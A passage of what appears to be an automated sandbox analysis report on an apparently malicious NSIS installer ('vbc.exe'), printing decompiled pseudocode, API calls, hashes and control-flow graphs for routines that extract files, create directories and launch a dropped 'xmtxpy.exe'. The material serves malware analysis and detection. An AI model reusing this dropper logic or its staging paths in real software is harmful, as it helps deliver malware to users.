                          							_t71 = _t64 + 0x14;
                          							__eflags = _t71;
                          							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                          						}
                          						asm("sbb eax, eax");
                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                          						__eflags = _t70;
                          						 *(_t85 + 8) = _t70;
                          					}
                          					__eflags =  *(_t85 + 8) - _t75;
                          					if( *(_t85 + 8) == _t75) {
                          						E0040573D(0x409b68);
                          					}
                          					__eflags =  *(_t85 + 8) - 1;
                          					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                          					__eflags = _t41 - 0xffffffff;
                          					 *(_t85 - 0x34) = _t41;
                          					if(_t41 != 0xffffffff) {
                          						break;
                          					}
                          					__eflags =  *(_t85 + 8) - _t75;
                          					if( *(_t85 + 8) != _t75) {
                          						E00404E23(0xffffffe2,  *(_t85 - 8));
                          						__eflags =  *(_t85 + 8) - 2;
                          						if(__eflags == 0) {
                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                          						}
                          						L31:
                          						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                          						__eflags =  *0x423f28;
                          						goto L32;
                          					} else {
                          						E00405A85(0x40a368, 0x424000);
                          						E00405A85(0x424000, 0x409b68);
                          						E00405AA7(_t75, 0x40a368, 0x409b68, 0x409f68,  *((intOrPtr*)(_t85 - 0x10)));
                          						E00405A85(0x424000, 0x40a368);
                          						_t62 = E00405346(0x409f68,  *(_t85 - 0x24) >> 3) - 4;
                          						__eflags = _t62;
                          						if(_t62 == 0) {
                          							continue;
                          						} else {
                          							__eflags = _t62 == 1;
                          							if(_t62 == 1) {
                          								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                          								L32:
                          								_t49 = 0;
                          								__eflags = 0;
                          							} else {
                          								_push(0x409b68);
                          								_push(0xfffffffa);
                          								E00404E23();
                          								L29:
                          								_t49 = 0x7fffffff;
                          							}
                          						}
                          					}
                          					L33:
                          					return _t49;
                          				}
                          				E00404E23(0xffffffea,  *(_t85 - 8));
                          				 *0x423f54 =  *0x423f54 + 1;
                          				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                          				 *0x423f54 =  *0x423f54 - 1;
                          				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                          				_t80 = _t43;
                          				if( *(_t85 - 0x18) != 0xffffffff) {
                          					L22:
                          					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                          				} else {
                          					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                          					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                          						goto L22;
                          					}
                          				}
                          				CloseHandle( *(_t85 - 0x34)); // executed
                          				__eflags = _t80 - _t75;
                          				if(_t80 >= _t75) {
                          					goto L31;
                          				} else {
                          					__eflags = _t80 - 0xfffffffe;
                          					if(_t80 != 0xfffffffe) {
                          						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                          					} else {
                          						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                          						lstrcatA(0x409b68,  *(_t85 - 8));
                          					}
                          					_push(0x200010);
                          					_push(0x409b68);
                          					E00405346();
                          					goto L29;
                          				}
                          				goto L33;
                          			}

















                          APIs
                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000000,00000000,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,fwwmjbqpxzax Setup,NSIS Error), ref: 00405A92
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                          • API String ID: 1941528284-1376950140
                          • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                          • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                          • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                          • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 486 402f01-402f10 487 402f12-402f28 SetFilePointer 486->487 488 402f2e-402f39 call 40302c 486->488 487->488 491 403025-403029 488->491 492 402f3f-402f59 ReadFile 488->492 493 403022 492->493 494 402f5f-402f62 492->494 496 403024 493->496 494->493 495 402f68-402f7b call 40302c 494->495 495->491 499 402f81-402f84 495->499 496->491 500 402ff1-402ff7 499->500 501 402f86-402f89 499->501 502 402ff9 500->502 503 402ffc-40300f ReadFile 500->503 504 40301d-403020 501->504 505 402f8f 501->505 502->503 503->493 506 403011-40301a 503->506 504->491 507 402f94-402f9c 505->507 506->504 508 402fa1-402fb3 ReadFile 507->508 509 402f9e 507->509 508->493 510 402fb5-402fb8 508->510 509->508 510->493 511 402fba-402fcf WriteFile 510->511 512 402fd1-402fd4 511->512 513 402fed-402fef 511->513 512->513 514 402fd6-402fe9 512->514 513->496 514->507 515 402feb 514->515 515->504
                          C-Code - Quality: 93%
                          			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                          				long _v8;
                          				intOrPtr _v12;
                          				void _t31;
                          				intOrPtr _t32;
                          				int _t35;
                          				long _t36;
                          				int _t37;
                          				long _t38;
                          				int _t40;
                          				int _t42;
                          				long _t43;
                          				long _t44;
                          				intOrPtr _t51;
                          				long _t55;
                          				long _t57;
                          
                          				_t31 = _a4;
                          				if(_t31 >= 0) {
                          					_t51 =  *0x423ef8; // 0x135a
                          					_t44 = _t31 + _t51;
                          					 *0x41703c = _t44;
                          					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                          				}
                          				_t57 = 4;
                          				_t32 = E0040302C(_t57);
                          				if(_t32 >= 0) {
                          					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                          					if(_t35 == 0 || _v8 != _t57) {
                          						L23:
                          						_push(0xfffffffd);
                          						goto L24;
                          					} else {
                          						 *0x41703c =  *0x41703c + _t57;
                          						_t32 = E0040302C(_a4);
                          						_v12 = _t32;
                          						if(_t32 >= 0) {
                          							if(_a12 != 0) {
                          								_t36 = _a4;
                          								if(_t36 >= _a16) {
                          									_t36 = _a16;
                          								}
                          								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                          								if(_t37 == 0) {
                          									goto L23;
                          								} else {
                          									_t38 = _v8;
                          									 *0x41703c =  *0x41703c + _t38;
                          									_v12 = _t38;
                          									goto L22;
                          								}
                          							} else {
                          								if(_a4 <= 0) {
                          									L22:
                          									_t32 = _v12;
                          								} else {
                          									while(1) {
                          										_t55 = 0x4000;
                          										if(_a4 < 0x4000) {
                          											_t55 = _a4;
                          										}
                          										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                          										if(_t40 == 0 || _t55 != _v8) {
                          											goto L23;
                          										}
                          										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                          										if(_t42 == 0 || _a16 != _t55) {
                          											_push(0xfffffffe);
                          											L24:
                          											_pop(_t32);
                          										} else {
                          											_t43 = _v8;
                          											_v12 = _v12 + _t43;
                          											_a4 = _a4 - _t43;
                          											 *0x41703c =  *0x41703c + _t43;
                          											if(_a4 > 0) {
                          												continue;
                          											} else {
                          												goto L22;
                          											}
                          										}
                          										goto L25;
                          									}
                          									goto L23;
                          								}
                          							}
                          						}
                          					}
                          				}
                          				L25:
                          				return _t32;
                          			}



















                          APIs
                          • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402F28
                          • ReadFile.KERNELBASE(00409128,00000004,00007DE4,00000000,00000004), ref: 00402F55
                          • ReadFile.KERNELBASE(00413038,00004000,00007DE4,00000000,00409128), ref: 00402FAF
                          • WriteFile.KERNELBASE(00000000,00413038,00007DE4,000000FF,00000000), ref: 00402FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$Read$PointerWrite
                          • String ID: 80A
                          • API String ID: 2113905535-195308239
                          • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                          • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                          • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                          • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 516 40302c-403055 GetTickCount 517 403196-40319e call 402bc5 516->517 518 40305b-403086 call 4031da SetFilePointer 516->518 523 4031a0-4031a5 517->523 524 40308b-40309d 518->524 525 4030a1-4030af call 4031a8 524->525 526 40309f 524->526 529 4030b5-4030c1 525->529 530 403188-40318b 525->530 526->525 531 4030c7-4030cd 529->531 530->523 532 4030f8-403114 call 405e9d 531->532 533 4030cf-4030d5 531->533 539 403191 532->539 540 403116-40311e 532->540 533->532 534 4030d7-4030f7 call 402bc5 533->534 534->532 541 403193-403194 539->541 542 403120-403136 WriteFile 540->542 543 403152-403158 540->543 541->523 545 403138-40313c 542->545 546 40318d-40318f 542->546 543->539 544 40315a-40315c 543->544 544->539 547 40315e-403171 544->547 545->546 548 40313e-40314a 545->548 546->541 547->524 549 403177-403186 SetFilePointer 547->549 548->531 550 403150 548->550 549->517 550->547
                          C-Code - Quality: 93%
                          			E0040302C(intOrPtr _a4) {
                          				long _v4;
                          				void* __ecx;
                          				intOrPtr _t12;
                          				intOrPtr _t13;
                          				signed int _t14;
                          				void* _t16;
                          				void* _t17;
                          				long _t18;
                          				int _t21;
                          				intOrPtr _t22;
                          				intOrPtr _t34;
                          				long _t35;
                          				intOrPtr _t37;
                          				long _t40;
                          				intOrPtr _t46;
                          				intOrPtr _t47;
                          
                          				_t35 =  *0x41703c; // 0x56a38
                          				_t37 = _t35 -  *0x40afa8 + _a4;
                          				 *0x423eac = GetTickCount() + 0x1f4;
                          				if(_t37 <= 0) {
                          					L23:
                          					E00402BC5(1);
                          					return 0;
                          				}
                          				E004031DA( *0x41f04c);
                          				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                          				 *0x41f048 = _t37;
                          				 *0x417038 = 0;
                          				while(1) {
                          					L2:
                          					_t12 =  *0x417040; // 0x480d0
                          					_t34 = 0x4000;
                          					_t13 = _t12 -  *0x41f04c;
                          					if(_t13 <= 0x4000) {
                          						_t34 = _t13;
                          					}
                          					_t14 = E004031A8(0x413038, _t34); // executed
                          					if(_t14 == 0) {
                          						break;
                          					}
                          					 *0x41f04c =  *0x41f04c + _t34;
                          					 *0x40afc8 = 0x413038;
                          					 *0x40afcc = _t34;
                          					while(1) {
                          						_t46 =  *0x423eb0; // 0x8c0fa0
                          						if(_t46 != 0) {
                          							_t47 =  *0x423f40; // 0x0
                          							if(_t47 == 0) {
                          								_t22 =  *0x41f048; // 0x19be0
                          								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                          								E00402BC5(0);
                          							}
                          						}
                          						 *0x40afd0 = 0x40b038;
                          						 *0x40afd4 = 0x8000; // executed
                          						_t16 = E00405E9D(0x40afb0); // executed
                          						if(_t16 < 0) {
                          							break;
                          						}
                          						_t40 =  *0x40afd0 - 0x40b038;
                          						if(_t40 == 0) {
                          							if( *0x40afcc != 0 || _t34 == 0) {
                          								break;
                          							} else {
                          								L17:
                          								_t18 =  *0x41703c; // 0x56a38
                          								if(_t18 -  *0x40afa8 + _a4 > 0) {
                          									goto L2;
                          								}
                          								SetFilePointer( *0x409014, _t18, 0, 0);
                          								goto L23;
                          							}
                          						}
                          						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                          						if(_t21 == 0 || _t40 != _v4) {
                          							_push(0xfffffffe);
                          							L22:
                          							_pop(_t17);
                          							return _t17;
                          						} else {
                          							 *0x40afa8 =  *0x40afa8 + _t40;
                          							if( *0x40afcc != 0) {
                          								continue;
                          							}
                          							goto L17;
                          						}
                          					}
                          					_push(0xfffffffd);
                          					goto L22;
                          				}
                          				return _t14 | 0xffffffff;
                          			}




















                          APIs
                          • GetTickCount.KERNEL32(00000000,00000004,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403041
                            • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                          • WriteFile.KERNELBASE(0040B038,?,00000000,00000000,00413038), ref: 0040312E
                          • SetFilePointer.KERNEL32(00056A38,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$Pointer$CountTickWrite
                          • String ID: 80A
                          • API String ID: 2146148272-195308239
                          • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                          • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                          • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                          • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 551 4015b3-4015c6 call 4029e8 call 40560c 556 4015c8-4015e3 call 4055a3 CreateDirectoryA 551->556 557 40160a-40160d 551->557 565 401600-401608 556->565 566 4015e5-4015f0 GetLastError 556->566 558 40162d-40215b call 401423 557->558 559 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 557->559 572 40287d-40288c 558->572 559->572 565->556 565->557 569 4015f2-4015fb GetFileAttributesA 566->569 570 4015fd 566->570 569->565 569->570 570->565
                          C-Code - Quality: 85%
                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                          				struct _SECURITY_ATTRIBUTES** _t10;
                          				int _t19;
                          				struct _SECURITY_ATTRIBUTES* _t20;
                          				signed char _t22;
                          				struct _SECURITY_ATTRIBUTES* _t23;
                          				CHAR* _t25;
                          				struct _SECURITY_ATTRIBUTES** _t29;
                          				void* _t30;
                          
                          				_t23 = __ebx;
                          				_t25 = E004029E8(0xfffffff0);
                          				_t10 = E0040560C(_t25);
                          				_t27 = _t10;
                          				if(_t10 != __ebx) {
                          					do {
                          						_t29 = E004055A3(_t27, 0x5c);
                          						 *_t29 = _t23;
                          						 *((char*)(_t30 + 0xb)) =  *_t29;
                          						_t19 = CreateDirectoryA(_t25, _t23); // executed
                          						if(_t19 == 0) {
                          							if(GetLastError() != 0xb7) {
                          								L4:
                          								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                          							} else {
                          								_t22 = GetFileAttributesA(_t25); // executed
                          								if((_t22 & 0x00000010) == 0) {
                          									goto L4;
                          								}
                          							}
                          						}
                          						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                          						 *_t29 = _t20;
                          						_t27 =  &(_t29[0]);
                          					} while (_t20 != _t23);
                          				}
                          				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                          					_push(0xfffffff5);
                          					E00401423();
                          				} else {
                          					E00401423(0xffffffe6);
                          					E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t25);
                          					SetCurrentDirectoryA(_t25); // executed
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                          				return 0;
                          			}












                          APIs
                            • Part of subcall function 0040560C: CharNextA.USER32(004053BE), ref: 0040561A
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 3751793516-2935972921
                          • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                          • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                          • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                          • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 576 40578b-405795 577 405796-4057c0 GetTickCount GetTempFileNameA 576->577 578 4057c2-4057c4 577->578 579 4057cf-4057d1 577->579 578->577 580 4057c6 578->580 581 4057c9-4057cc 579->581 580->581
                          C-Code - Quality: 100%
                          			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                          				signed int _t11;
                          				int _t14;
                          				signed int _t16;
                          				void* _t19;
                          				CHAR* _t20;
                          
                          				_t20 = _a4;
                          				_t19 = 0x64;
                          				while(1) {
                          					_t19 = _t19 - 1;
                          					_a4 = 0x61736e;
                          					_t11 = GetTickCount();
                          					_t16 = 0x1a;
                          					_a6 = _a6 + _t11 % _t16;
                          					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                          					if(_t14 != 0) {
                          						break;
                          					}
                          					if(_t19 != 0) {
                          						continue;
                          					}
                          					 *_t20 =  *_t20 & 0x00000000;
                          					return _t14;
                          				}
                          				return _t20;
                          			}









                          APIs
                          • GetTickCount.KERNEL32("C:\Users\Public\vbc.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403223,1033,C:\Users\user\AppData\Local\Temp\), ref: 0040579E
                          • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004057B8
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-1498418707
                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 582 4052e5-405312 CreateProcessA 583 405320-405321 582->583 584 405314-40531d CloseHandle 582->584 584->583
                          C-Code - Quality: 100%
                          			E004052E5(CHAR* _a4) {
                          				struct _PROCESS_INFORMATION _v20;
                          				int _t7;
                          
                          				0x4224a0->cb = 0x44;
                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20); // executed
                          				if(_t7 != 0) {
                          					CloseHandle(_v20.hThread);
                          					return _v20.hProcess;
                          				}
                          				return _t7;
                          			}






                          APIs
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                          • CloseHandle.KERNEL32(?), ref: 00405317
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                          • Error launching installer, xrefs: 004052F8
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                          • API String ID: 3712363035-3894416041
                          • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                          • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                          • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                          • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 672 405659-405674 call 405a85 call 40560c 677 405676-405678 672->677 678 40567a-405687 call 405ce3 672->678 679 4056cc-4056ce 677->679 682 405693-405695 678->682 683 405689-40568d 678->683 685 4056ab-4056b4 lstrlenA 682->685 683->677 684 40568f-405691 683->684 684->677 684->682 686 4056b6-4056ca call 405578 GetFileAttributesA 685->686 687 405697-40569e call 405d7c 685->687 686->679 692 4056a0-4056a3 687->692 693 4056a5-4056a6 call 4055bf 687->693 692->677 692->693 693->685
                          C-Code - Quality: 53%
                          			E00405659(void* __eflags, intOrPtr _a4) {
                          				int _t11;
                          				signed char* _t12;
                          				long _t16;
                          				intOrPtr _t18;
                          				intOrPtr* _t21;
                          				void* _t22;
                          
                          				E00405A85(0x4218a0, _a4);
                          				_t21 = E0040560C(0x4218a0);
                          				if(_t21 != 0) {
                          					E00405CE3(_t21);
                          					if(( *0x423eb8 & 0x00000080) == 0) {
                          						L5:
                          						_t22 = _t21 - 0x4218a0;
                          						while(1) {
                          							_t11 = lstrlenA(0x4218a0);
                          							_push(0x4218a0);
                          							if(_t11 <= _t22) {
                          								break;
                          							}
                          							_t12 = E00405D7C();
                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                          								E004055BF(0x4218a0);
                          								continue;
                          							} else {
                          								goto L1;
                          							}
                          						}
                          						E00405578();
                          						_t16 = GetFileAttributesA(??); // executed
                          						return 0 | _t16 != 0xffffffff;
                          					}
                          					_t18 =  *_t21;
                          					if(_t18 == 0 || _t18 == 0x5c) {
                          						goto L1;
                          					} else {
                          						goto L5;
                          					}
                          				}
                          				L1:
                          				return 0;
                          			}










                          APIs
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,fwwmjbqpxzax Setup,NSIS Error), ref: 00405A92
                            • Part of subcall function 0040560C: CharNextA.USER32(004053BE), ref: 0040561A
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,74EC13E0,004053BE,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 004056AC
                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,74EC13E0,004053BE,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 004056BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: C:\
                          • API String ID: 3248276644-3404278061
                          • Opcode ID: 45f9fc393155a5db5d7088df542a2f6c776c74327cf868b98864bd445eec5352
                          • Instruction ID: 45da588c54f8925d2f58c8e200b054ed71ba1ecc9485bcb26325529b6e95793d
                          • Opcode Fuzzy Hash: 45f9fc393155a5db5d7088df542a2f6c776c74327cf868b98864bd445eec5352
                          • Instruction Fuzzy Hash: 4FF02D21604D5525D32222355C09FAF1B05CE863143994E3BF858B12D6C63D89428CAD
                          Uniqueness

